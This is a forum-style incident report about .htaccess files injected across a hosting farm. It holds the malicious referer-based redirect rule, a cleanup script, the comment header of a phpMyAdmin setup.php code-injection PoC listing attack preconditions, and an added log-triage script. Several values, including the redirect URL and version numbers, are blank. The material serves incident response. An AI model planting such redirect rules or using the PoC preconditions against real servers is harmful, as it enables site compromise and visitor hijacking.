Aug 13, 2011

Finding Webserver Vulnerability


We operate a webserver farm hosting around 300 websites.

Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites.

The content of the .htaccess file was this:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteRule .{REMOTE_ADDR}

Googling for that url (which is the md5 hash of “antivirus”) I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is.

I have searched most of our logs, but haven’t found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole?

So far we have determined:

  • the changes were made as www-data, so apache or its plugins are likely the culprit
  • all the changes were made within 15 minutes of each other, so it was probably automated
  • since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
  • if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)

Any more hints would be appreciated.


For those who need it, here is the script I used to clean up the .htaccess files:

#!/bin/sh
# Values not shown in the post (set before running): DIR is the directory
# tree to scan, PATT is a string that appears only in the injected lines.
DIR=/var/www            # placeholder
PATT='INJECTED-URL'     # placeholder
TMP=$(mktemp /tmp/htaccess.XXXXXX)
find "$DIR" -name .htaccess | while read -r FILE; do
  if grep -q "$PATT" "$FILE"; then
    if [ "$(wc -l < "$FILE")" -eq 4 ]; then
      rm "$FILE"                      # file consisted only of the injected lines
    elif tail -n1 "$FILE" | grep -q "$PATT"; then
      cp "$FILE" "$TMP"               # injected lines were appended: drop them
      LINES=$(wc -l < "$TMP")
      GOODLINES=$((LINES - 4))        # assumes the same 4-line block as above
      head -n "$GOODLINES" "$TMP" > "$FILE"
    else
      echo "$FILE requires manual intervention"
    fi
  fi
done
rm -f "$TMP"


There’s an exploit of phpMyAdmin


# CVE-2009-1151: phpMyAdmin ‘/scripts/setup.php’ PHP Code Injection RCE PoC v0.11
# by pagvac (, 4th June 2009.
# special thanks to Greg Ose ( for discovering such a cool vuln,
# and to str0ke ( for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4,,, 3.0.0 and
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before
# and 3.x before according to PMASA-2009-3
# 2) it seems this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the wizard method, rather than manual method:
# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘’ which is where
# our evil PHP code is injected 8)

# more info on:
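A log-triage helper for the situation the question describes: given the earliest .htaccess mtime, it lists the requests across all vhosts in the surrounding window that could have written to disk (POSTs), and flags any hit on the phpMyAdmin setup script named in the answer. This is an added example, not code from the question or the answer; the vhost-prefixed combined log format, the sample log lines, the IPs and the timestamps are all constructed.

```python
import re
from datetime import datetime, timedelta
# Combined log format with a leading vhost field (an assumption about how the
# farm logs; adjust LOG_RE to match your own LogFormat).
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Paths worth flagging regardless of method, taken from the phpMyAdmin answer.
SUSPICIOUS_PATHS = ("/scripts/setup.php",)

# Constructed sample lines: ordinary traffic plus a setup-wizard POST on one site.
SAMPLE_LOG = """\
siteA.example 198.51.100.7 - - [12/Aug/2011:09:58:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "http://search.example/?q=x" "Mozilla/5.0"
siteB.example 203.0.113.9 - - [12/Aug/2011:10:01:42 +0000] "POST /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 311 "-" "Python-urllib/2.6"
siteB.example 203.0.113.9 - - [12/Aug/2011:10:01:44 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 200 4410 "-" "Python-urllib/2.6"
siteC.example 198.51.100.8 - - [12/Aug/2011:10:05:00 +0000] "GET /blog/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
siteA.example 203.0.113.9 - - [12/Aug/2011:13:30:00 +0000] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def parse(line):
    """Split one log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def triage(log_text, planted_at, window_min=15):
    """Return (vhost, ip, method, path) for every request within window_min minutes
    of planted_at (earliest .htaccess mtime, log timestamp format) that is a POST
    or touches a suspicious path."""
    centre = datetime.strptime(planted_at, TS_FMT)
    lo, hi = centre - timedelta(minutes=window_min), centre + timedelta(minutes=window_min)
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or not (lo <= rec["ts"] <= hi):
            continue
        if rec["method"] == "POST" or any(p in rec["path"] for p in SUSPICIOUS_PATHS):
            hits.append((rec["vhost"], rec["ip"], rec["method"], rec["path"]))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG, "12/Aug/2011:10:12:00 +0000"):
        print(hit)
```

Run it against the concatenated logs of every vhost, not just the site where the first .htaccess appeared, since the question notes the injection probably came through a single site.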
